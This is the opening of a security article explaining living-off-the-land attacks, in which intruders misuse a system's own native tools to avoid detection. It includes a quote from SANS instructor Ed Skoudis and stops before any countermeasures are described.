How to Evict Attackers Living Off Your Land

Why invest in top-shelf malware just to have it be turned away by antivirus tools again and again? Why launch a cyberattack like that when your target is already full of perfectly good attack tools, just waiting for you?

More and more threat actors are coming to that conclusion. As cyber defenses improve, adversaries are shifting to stealthy “living-off-the-land” (LotL) attacks that defy many automated security measures. 

 

Here are some ways to begin countering the threat.    

 

The term “living off the land” refers to fileless, malware-less attacks that turn a system’s own native tools against them. Bad actors use perfectly legitimate programs and processes to perform malicious activities, thereby blending into a network and hiding among the legitimate processes to pull off a stealthy exploit.

“Traditionally, attackers have exploited a target environment and then pushed their own tools onto target machines, including backdoors, rootkits, harvesting tools, and more,” says Ed Skoudis, a security veteran and instructor with the SANS Institute. “With living-off-the-land techniques, the attacker uses the compromised machine itself, and components of its operating system, to attack that system further and to spread to other machines in the environment. So the compromised machine’s operating system becomes, in essence, the attacker’s toolkit. The attacker uses its resources and place on the network to undermine the entire targeting environment.”